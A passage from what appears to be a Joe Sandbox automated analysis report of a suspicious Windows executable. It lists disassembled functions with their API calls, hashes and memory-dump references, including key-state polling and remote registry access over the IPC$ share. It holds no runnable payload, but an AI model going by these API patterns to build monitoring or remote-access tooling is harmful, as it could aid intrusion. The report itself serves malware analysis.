                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                          • DeleteObject.GDI32(?), ref: 0047151E
                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                          • DeleteObject.GDI32(?), ref: 004715EA
                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                          • String ID:
                          • API String ID: 3218148540-0
                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                          APIs
                          • _wcsncpy.LIBCMT ref: 00467490
                          • _wcsncpy.LIBCMT ref: 004674BC
                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                          • _wcstok.LIBCMT ref: 004674FF
                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                          • _wcstok.LIBCMT ref: 004675B2
                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                          • _wcslen.LIBCMT ref: 00467793
                          • _wcscpy.LIBCMT ref: 00467641
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • _wcslen.LIBCMT ref: 004677BD
                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                          • String ID: X
                          • API String ID: 3104067586-3081909835
                          • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                          • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                          • _wcslen.LIBCMT ref: 0046CDB0
                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                          Strings
                          • NULL Pointer assignment, xrefs: 0046CEA6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                          • String ID: NULL Pointer assignment
                          • API String ID: 440038798-2785691316
                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                          APIs
                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                          • _wcslen.LIBCMT ref: 004610A3
                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                          • GetWindowRect.USER32(?,?), ref: 00461248
                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                          • String ID: ThumbnailClass
                          • API String ID: 4136854206-1241985126
                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                          APIs
                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                          • GetClientRect.USER32(?,?), ref: 00471A1A
                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                          • DestroyIcon.USER32(?), ref: 00471AF4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                          • String ID: 2
                          • API String ID: 1331449709-450215437
                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                          • __swprintf.LIBCMT ref: 00460915
                          • __swprintf.LIBCMT ref: 0046092D
                          • _wprintf.LIBCMT ref: 004609E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                          • API String ID: 3054410614-2561132961
                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                          APIs
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 600699880-22481851
                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: DestroyWindow
                          • String ID: static
                          • API String ID: 3375834691-2160076837
                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                          • API String ID: 2907320926-3566645568
                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                          APIs
                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                          • DeleteObject.GDI32(00780045), ref: 00470A04
                          • DestroyIcon.USER32(00740069), ref: 00470A1C
                          • DeleteObject.GDI32(E3A40E53), ref: 00470A34
                          • DestroyWindow.USER32(0041004E), ref: 00470A4C
                          • DestroyIcon.USER32(?), ref: 00470A73
                          • DestroyIcon.USER32(?), ref: 00470A81
                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                          • String ID:
                          • API String ID: 1237572874-0
                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                          • VariantInit.OLEAUT32(?), ref: 004793E1
                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                          • VariantClear.OLEAUT32(?), ref: 00479489
                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                          • VariantClear.OLEAUT32(?), ref: 004794CA
                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                          • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                          APIs
                          • GetKeyboardState.USER32(?), ref: 0044480E
                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                          • GetKeyState.USER32(000000A0), ref: 004448AA
                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                          • GetKeyState.USER32(000000A1), ref: 004448D9
                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                          • GetKeyState.USER32(00000011), ref: 00444903
                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                          • GetKeyState.USER32(00000012), ref: 0044492D
                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                          • GetKeyState.USER32(0000005B), ref: 00444958
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
